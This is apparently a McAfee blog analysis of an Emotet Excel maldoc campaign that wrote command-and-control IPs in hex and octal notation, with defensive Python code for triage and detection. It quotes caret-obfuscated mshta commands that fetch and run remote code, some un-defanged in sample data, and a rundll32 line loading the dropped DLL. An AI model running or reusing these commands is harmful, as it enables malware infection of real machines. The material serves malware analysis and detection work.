Authored By: Kiran Raj
In a recent Emotet campaign, McAfee Researchers observed a change in technique. The Emotet maldoc was using hexadecimal and octal formats to represent an IP address, which is usually written in dotted-decimal format. An example of each format is shown below:
Hexadecimal format: 0xb907d607
Octal format: 0056.0151.0121.0114
Decimal format: 126.96.36.199
This change in format might evade some AV products that rely on matching command-line parameters, but McAfee was still able to protect our customers. This blog explains this new technique.
Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee
The initial attack vector is a phishing email with a Microsoft Excel attachment.
The downloaded Emotet payload is executed by rundll32.exe and establishes a connection to the adversaries' command-and-control server.
Below is the image (figure 2) of the initial worksheet opened in Excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.
On examining the Excel spreadsheet further, we can see a few cell addresses added in the Name Manager window. Cells referenced by the Auto_Open name are executed automatically, resulting in malicious code execution.
Figure 3: Name Manager and Auto_Open triggers
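The two indicators described above, hidden worksheets and an Auto_Open defined name, are both recorded in the workbook's xl/workbook.xml part, so they can be checked without opening the file in Excel. The following is an added example written for this post, not McAfee's code or tooling; it parses a constructed workbook.xml (modelled on the description, not taken from the sample) with the standard library only, and assumes the OOXML convention that built-in names carry the `_xlnm.` prefix (it also accepts the bare `Auto_Open` spelling and suffixed variants).

```python
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

# Constructed xl/workbook.xml: a visible lure sheet, a hidden and a veryHidden sheet,
# and an Auto_Open defined name pointing into the hidden sheet. Not from a real sample.
SAMPLE_WORKBOOK_XML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Macro1" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Data" sheetId="3" state="veryHidden" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="0">Sheet1!$A$1:$D$20</definedName>
  </definedNames>
</workbook>
"""

# Assumed name pattern: optional _xlnm. prefix, case-insensitive, optional suffix.
AUTO_OPEN_RE = re.compile(r"^(_xlnm\.)?auto_open", re.IGNORECASE)


def inspect_workbook_xml(xml_bytes: bytes) -> Dict[str, List[str]]:
    """Report sheets that are not visible and any Auto_Open-style defined names."""
    root = ET.fromstring(xml_bytes)
    hidden = []
    for sheet in root.findall("m:sheets/m:sheet", NS):
        state = sheet.get("state", "visible")  # visible | hidden | veryHidden
        if state != "visible":
            hidden.append(f"{sheet.get('name')} ({state})")
    auto_open = []
    for dn in root.findall("m:definedNames/m:definedName", NS):
        name = dn.get("name", "")
        if AUTO_OPEN_RE.match(name):
            auto_open.append(f"{name} -> {(dn.text or '').strip()}")
    return {"hidden_sheets": hidden, "auto_open_names": auto_open}


def inspect_xlsx(path: str) -> Dict[str, List[str]]:
    """Open a real .xlsx/.xlsm (a zip container) and inspect its workbook part."""
    with zipfile.ZipFile(path) as z:
        return inspect_workbook_xml(z.read("xl/workbook.xml"))


def is_suspicious(report: Dict[str, List[str]]) -> bool:
    """Auto-executing name plus non-visible sheets is the combination the post describes."""
    return bool(report["auto_open_names"]) and bool(report["hidden_sheets"])


if __name__ == "__main__":
    report = inspect_workbook_xml(SAMPLE_WORKBOOK_XML)
    print(report, "suspicious" if is_suspicious(report) else "clean")
```

Auto_Open on its own is not malicious (legitimate workbooks use it), which is why the triage verdict is keyed on the combination with hidden or veryHidden sheets; in practice the next step is to dump the cells the name points to.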
Below are the commands used in the hexadecimal and octal variants of the maldocs (the IP addresses are defanged with square brackets):
cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html
cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html
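Two evasions are stacked in these command lines: cmd.exe caret escapes split the keywords, and the URL host is written as a single hex number or as dotted octal, both of which the URL resolver accepts as an IPv4 address. A detection that compares command lines against literal strings misses both. The following is an added example, not McAfee's detection logic: it strips the caret escapes and normalises every numeric host spelling the classic inet_aton rules allow (hex, octal, decimal, mixed, and fewer than four components, which goes beyond the two forms on the page) to dotted-decimal. The sample command lines are constructed from the two shown above with the defanging brackets removed, plus a plain dotted-decimal control.

```python
import ipaddress
import re
from typing import Optional

# Constructed sample command lines (defanging brackets removed so the URLs parse).
SAMPLE_COMMANDS = [
    "cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html",
    "cmd /c m^sh^t^a h^tt^p^:/^/0056.0151.0121.0114/c.html",
    "cmd /c mshta http://126.96.36.199/c.html",
]

_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|[0-9]+)$")


def strip_cmd_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: '^X' is the literal character X,
    so 'm^sh^t^a' is executed as 'mshta'."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def _parse_part(part: str) -> int:
    """Interpret one dotted component the way inet_aton does:
    0x prefix is hex, a leading zero is octal, anything else is decimal."""
    if not _PART.match(part):
        raise ValueError(f"not a numeric component: {part!r}")
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def host_to_dotted_decimal(host: str) -> Optional[str]:
    """Normalise a numeric IPv4 host (hex, octal, decimal, mixed, or with fewer
    than four components) to canonical dotted-decimal. Returns None for hostnames."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # Leading components are single bytes; the last one fills the remaining bytes.
    value = 0
    for v in values[:-1]:
        if v > 0xFF:
            return None
        value = (value << 8) | v
    remaining_bits = 8 * (4 - (len(values) - 1))
    if values[-1] >= (1 << remaining_bits):
        return None
    value = (value << remaining_bits) | values[-1]
    return str(ipaddress.IPv4Address(value))


def analyze_command(cmdline: str) -> Optional[dict]:
    """Extract the URL host from a (possibly caret-obfuscated) command line and
    report whether it uses a non-dotted-decimal IP spelling."""
    plain = strip_cmd_carets(cmdline)
    m = re.search(r"https?://([^/\s:?#]+)", plain, re.IGNORECASE)
    if not m:
        return None
    host = m.group(1)
    canonical = host_to_dotted_decimal(host)
    return {
        "host": host,
        "canonical": canonical,
        "obfuscated_ip": canonical is not None and canonical != host,
        "caret_escaped": "^" in cmdline,
    }


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(analyze_command(cmd))
```

Matching on the canonical form means an indicator written once as dotted-decimal also catches the hex, octal and plain-integer spellings of the same address, and `obfuscated_ip` is itself a useful signal because ordinary software almost never writes URLs that way.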
Figure 4: Process tree of excel execution
Figure 5: Image of HTML page viewed in a browser
The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server.
cmd /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
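The process chain in figure 4 and the rundll32.exe command above give two behavioural signals that do not depend on the IP spelling at all: a scripting or proxy-execution binary with an Office application as an ancestor, and rundll32.exe loading a DLL from a user-writable directory. The following is an added example, not McAfee's detection content; it runs both heuristics over constructed process-creation events shaped like the chain in this post (parent/child relationships, image paths and command lines are made up to match the description, plus one benign rundll32 control), and the set of user-writable prefixes is an assumption to be tuned per environment.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events approximating figure 4's chain plus a benign control.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "EXCEL.EXE invoice.xlsm"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html"},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://0xb907d607/fer/fer.html"},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString"},
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
PROXY_BINS = {"cmd.exe", "mshta.exe", "rundll32.exe", "powershell.exe"}
# Assumed user-writable roots (lowercase prefixes); adjust for the environment.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")
DLL_PATH_RE = re.compile(r"([a-z]:\\[^\s,]+\.dll)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lowercase file name from a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(by_pid: Dict[int, dict], event: dict) -> List[str]:
    """Image basenames of the parent, grandparent, ... as far as the event set reaches."""
    chain, cur = [], event
    while cur["ppid"] in by_pid:
        cur = by_pid[cur["ppid"]]
        chain.append(basename(cur["image"]))
    return chain


def findings(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (pid, reason) pairs for events matching either heuristic."""
    by_pid = {e["pid"]: e for e in events}
    out = []
    for e in events:
        img = basename(e["image"])
        if img not in PROXY_BINS:
            continue
        # Heuristic 1: proxy-execution binary descended from an Office application.
        if any(a in OFFICE_APPS for a in ancestors(by_pid, e)):
            out.append((e["pid"], f"office-spawned {img}"))
        # Heuristic 2: rundll32 loading a DLL from a user-writable location.
        if img == "rundll32.exe":
            m = DLL_PATH_RE.search(e["cmdline"])
            if m and m.group(1).lower().startswith(USER_WRITABLE):
                out.append((e["pid"], "rundll32 DLL from user-writable path"))
    return out


if __name__ == "__main__":
    for pid, reason in findings(SAMPLE_EVENTS):
        print(pid, reason)
```

The ancestry walk is what makes the first rule robust to the intermediate cmd.exe and mshta.exe hops: rundll32.exe is flagged even though its direct parent is mshta.exe, not Excel.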
McAfee LiveSafe and Total Protection
- Initial maldoc uses phishing strings to convince users to open the maldoc
- Manual execution by user
- Command and Control / Standard Application Layer Protocol: attempts to connect through HTTP
- Command and Scripting Interpreter: starts CMD.EXE for command execution; Excel uses cmd and PowerShell to execute commands
- Signed Binary Proxy Execution: uses RUNDLL32.EXE and MSHTA.EXE to load the library
Office documents have been used as an attack vector by many malware families in recent times. The threat actors behind these families are constantly changing their techniques in order to evade detection. McAfee Researchers are constantly monitoring the threat landscape to identify these changes in technique, to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.
The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.